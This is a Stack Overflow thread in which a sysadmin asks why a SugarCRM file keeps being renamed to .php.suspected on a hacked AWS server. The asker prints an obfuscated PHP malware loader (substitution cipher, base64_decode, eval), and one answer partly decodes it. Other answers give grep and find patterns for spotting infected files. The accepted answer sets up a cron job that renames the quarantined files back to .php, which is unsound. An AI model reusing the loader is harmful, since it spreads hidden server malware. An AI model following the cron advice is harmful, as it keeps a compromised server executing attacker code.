13

Since last 4 days, we are facing strange issue on our Production server (AWS EC2 instance) specific to only one site which is SugarCRM.

Issue is /home/site_folder/public_html/include/MassUpdate.php file is renamed automatically to /home/site_folder/public_html/include/MassUpdate.php.suspected

This happens 2-3 times in a day with 3-4 hours of gap. This issue occurs only in case of specific site, even it doesn't occur for staging replica of the same site. I even checked code of that file from both sites, it's same.

We have Googled and found, such issue occurs mostly for Wordpress sites and it could be because of attack. But we checked our server against the attack, there isn't any. Also there is no virus/malware scan running on server.

What should we do?

Update: We found few things after going through this link We executed egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/ And found that there are few files with following sample code.

    <?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>

Seems some malware, how we go about removing it permanently?

Thanks

Amol Chakane
  • 1,471
  • 2
  • 19
  • 41
  • May be there is some cron function doin this. – Harshit Sep 29 '15 at 04:45
  • No there isn't such cron running. – Amol Chakane Sep 29 '15 at 04:59
  • 3
    If this is for a production app, I recommend you contact a security expert immediately. Can you check your web-server logs to see any weird requests to that file immediately before its name is changed? Can you try running this from the CLI `find . -name "*.php" -exec grep -H "eval(" {} \;` from the public_html/ level. This will search for all php files that have possibly been created by the hacker that calls `eval`. Note you may find some false positives with this. –  Sep 29 '15 at 05:05
  • 2
    I recommend you disable any plugins for your crm too, as plugins are the most popular attack vectors for hackers. –  Sep 29 '15 at 05:06
  • @sudosoul is right, wordpress plugins are the most popular attack vectors. You may also check if any script like perl, python, shell script doing this. – Harshit Sep 29 '15 at 05:08
  • @sudosoul I tried that command. That didn't work. But I checked the code of file, it has `eval(combo_{$varname}.jsscript(''));` this line of code. And it's there on staging site too. But that is not renamed. – Amol Chakane Sep 29 '15 at 05:27
  • There seem to be a lot of WordPress sites impacted by this issue. It positively reeks of a security vulnerability, and your machine almost certainly has been compromised, but *not* the files renamed to *.php.suspected*. That appears to be a distraction. Sadly, though perhaps not surprisingly, most of The posts I see talk about renaming files and sometimes finding the malware, but there's virtually no discussion of the actual nature of the vulnerability that allows the original exploit to occur. If you are not running WordPress then perhaps it's a more general PHP vulnerability. – Michael - sqlbot Sep 29 '15 at 08:31
  • @Michael-sqlbot You are right. So how should we go ahead with resolving such issue? – Amol Chakane Sep 29 '15 at 08:53
  • 1
    `Also there is no virus/malware scan running on server.` Why not? This should be running. **Always**. *If you leave your doors unlocked don't be surprised to find the neighbours cat drinking all your milk and smoking your fags* :-p – Martin Oct 01 '15 at 12:56
  • 1
    just create cronjob #!/bin/bash cd /home/username/public_html find /home/username/public_html -type f -name '*.suspected' | while read f; do mv "$f" "${f%.suspected}"; done – James M Jun 08 '17 at 16:05
  • 1
    @JamesMaynard Correct, that's the solution I used. – Amol Chakane Jun 12 '17 at 07:17
  • Also getting this type of garbage code in many files which is not wordpress, this is simple php file. how can i resolve this? – Hidayt Rahman May 17 '18 at 16:59
  • @HidaytRahman I used solution suggested by James M – Amol Chakane May 24 '18 at 06:05
  • can you please tell step by step, I am new – Hidayt Rahman May 26 '18 at 07:23
  • @HidaytRahman Posted answer with details. – Amol Chakane May 30 '18 at 06:52

4 Answers4

2

It's somewhat obfuscated, but I've de-obfuscated it.The function flnftovr takes a string and an array as arguments. It creates a new string $ggy using the formula 

isset($array[$string[$i]]) ? $array[$string[$i]] : $string[$i];}

It then preppends base64_decode to the string.

The string is $s, the array is $koicev. It then evals the result of this manipulation. So eventually a string gets created:

base64_decode(QGluaV9zZXQoJ2Vycm9yX2xvZycsIE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsIDApOwpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmlmKGlzc2V0KCRfU0VSVkVSKfZW5jb2RlKHNlcmlhbGl6ZSgkcmVzKSk7Cn0=)

So what actually gets run on your server is:

@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);

if(isset($_SERVER)
encode(serialize($res));
}

If you didn't create this and you suspect your site has been hacked, I'd suggest you wipe the server, and create a new installation of whatever apps are running on your server.

Alan Apter
  • 61
  • 3
2

The renaming of .php files to .php.suspected keeps happening today. The following commands should not come up with something:

find <web site root> -name '*.suspected' -print
find <web site root> -name '.*.ico' -print

In my case, the infected files could be located with the following commands:

cd <web site root>
egrep -Rl '\$GLOBALS.*\\x'
egrep -Rl -Ezo '/\*(\w+)\*/\s*@include\s*[^;]+;\s*/\*'
egrep -Rl -E '^.+(\$_COOKIE|\$_POST).+eval.+$'

I have prepared a longer description of the problem and how to deal with it at GitHub.

Javier Elices
  • 1,702
  • 1
  • 12
  • 20
2

Renaming php files to php.suspected is usually intended and done by hacker's script. They change file extension to give the impression that the file was checked by some antimalware software, is secure and can't be executed. But, in fact, isn't. They change extension to "php" anytime they want to invoke the script and after it, they change the extension back to "suspected". You can read about it on Securi Research Labs

Maybe this post is old but the topic is still alive. Especially according to June 2019 malware campaign targeting WordPress plugins. I found a few "suspected" files in my client's WordPress subdirectories (e.g. wp-content)

Wojtek Suszycki
  • 64
  • 6
0

Posting this answer, it may help others.

  1. Create a file with '.sh' extension at your convenient location.
  2. Add following code in it.

#Rename your_file_name.php.suspected to your_file_name.php mv /<path_to_your_file>/your_file_name.php.suspected /<path_to_your_file>/your_file_name.php

  1. Save this file.
  2. Set cron for every 10 minute (or whatever interval you need), using following line in crontab

*/10 * * * * path_to_cron_file.sh

  1. Restart crontab service.

You will get lot of documentation on creating cron on Google.

Amol Chakane
  • 1,471
  • 2
  • 19
  • 41